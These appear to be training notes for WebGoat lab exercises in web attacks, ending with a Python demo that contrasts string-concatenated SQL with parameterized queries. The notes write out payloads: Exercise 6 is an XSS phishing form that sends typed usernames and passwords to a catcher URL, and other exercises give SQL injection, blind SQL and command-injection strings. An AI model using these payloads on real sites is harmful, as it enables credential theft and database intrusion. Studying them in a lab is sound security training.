# 2020.08.26 Hands-on Practice

## Exercise 1: Code Quality -> Discover Clues in the HTML

* Consider the difference between View Source and Inspect Element

## Exercise 2: Parameter Tampering -> Exploit Hidden Fields

* Use a proxy tool such as Burp Suite to intercept the request
* Consider the difference between GET and POST
* Remember to enable the proxy setting in IE

## Exercise 3: Cross-Site Scripting (XSS) -> Reflected XSS Attacks

* `<script>alert('Activate XSS')</script>`

## Exercise 4: Cross-Site Scripting (XSS) -> Stored XSS Attacks

* `<script>alert('User Information has been stolen')</script>`

## Exercise 5: Cross-Site Scripting (XSS) -> Stage1: Stored XSS Attacks

* Edit your own profile
* `<script>alert('Link to malicious site')</script>`

## Exercise 6: Cross-Site Scripting (XSS) -> Phishing with XSS

```
function hack(){
  alert("Login="+document.forms[0].user.value + "Password="+document.forms[0].pass.value);
  XSSImage=new Image;
  XSSImage.src="http://192.168.0.90:8080/webgoat/catcher"
    +"?PROPERTY=yes"
    +"&user="+document.forms[0].user.value
    +"&password="+document.forms[0].pass.value;
}

<form>
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br><br><HR>
```

## Exercise 7: Injection Flaws -> Log Spoofing

```
test%0aLogin succeeded for username:admin
```

## Exercise 8: Injection Flaws -> Numeric SQL Injection

* Use Burp Suite

```
101 or 1 = 1
```

## Exercise 9: Injection Flaws -> String SQL Injection

```
Smith' OR '1'='1
```

## Exercise 10: Injection Flaws -> Command Injection

```
& netstat -an & ipconfig
```

## Exercise 11: Injection Flaws -> Blind Numeric SQL Injection

```
101 AND True
101 AND ( ( SELECT pin FROM pins WHERE cc_number=1111222233334444 ) >1000 )
```
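
The inputs in Exercises 8, 9 and 11 only change the query because the application concatenates them into the SQL text. The following is an added example, not part of the original notes and not WebGoat's own code: it runs those three inputs against a concatenating query and against a validated, parameterized one. The `accounts` table, the sample rows, the pin value and all function names are constructed assumptions; only the `pins` table and its column names come from the notes.

```python
import sqlite3

def make_db():
    # Constructed sample data; the layout is an assumption, not WebGoat's schema.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE accounts (id INTEGER, last_name TEXT);
        INSERT INTO accounts VALUES (101, 'Smith'), (102, 'Jones'), (103, 'Lee');
        CREATE TABLE pins (cc_number INTEGER, pin INTEGER);
        INSERT INTO pins VALUES (1111222233334444, 4321);
    """)
    return db

def by_id_vulnerable(db, account_id):
    # Input is pasted into the SQL text, so the database parses it as SQL.
    return db.execute("SELECT id FROM accounts WHERE id = " + account_id).fetchall()

def by_name_vulnerable(db, name):
    return db.execute("SELECT id FROM accounts WHERE last_name = '" + name + "'").fetchall()

def by_id_safe(db, account_id):
    # Validate the type, then bind the value: it can never become SQL syntax.
    if not account_id.isdecimal():
        raise ValueError("account id must be numeric")
    return db.execute("SELECT id FROM accounts WHERE id = ?", (int(account_id),)).fetchall()

def by_name_safe(db, name):
    return db.execute("SELECT id FROM accounts WHERE last_name = ?", (name,)).fetchall()

# The three inputs from Exercises 8, 9 and 11.
NUMERIC = "101 or 1 = 1"
STRING = "Smith' OR '1'='1"
BLIND = "101 AND ((SELECT pin FROM pins WHERE cc_number=1111222233334444) > 1000)"

def rejected(db, value):
    try:
        by_id_safe(db, value)
        return False
    except ValueError:
        return True

def demo():
    db = make_db()
    return {
        "numeric_vulnerable": len(by_id_vulnerable(db, NUMERIC)),  # every row
        "string_vulnerable": len(by_name_vulnerable(db, STRING)),  # every row
        "blind_vulnerable": len(by_id_vulnerable(db, BLIND)),      # row count answers the subquery
        "string_safe": len(by_name_safe(db, STRING)),              # treated as a literal name
        "numeric_safe_rejected": rejected(db, NUMERIC),
        "blind_safe_rejected": rejected(db, BLIND),
    }

if __name__ == "__main__":
    print(demo())
```

With binding in place, the string input is compared as a literal last name and matches nothing, and the numeric inputs never reach the database.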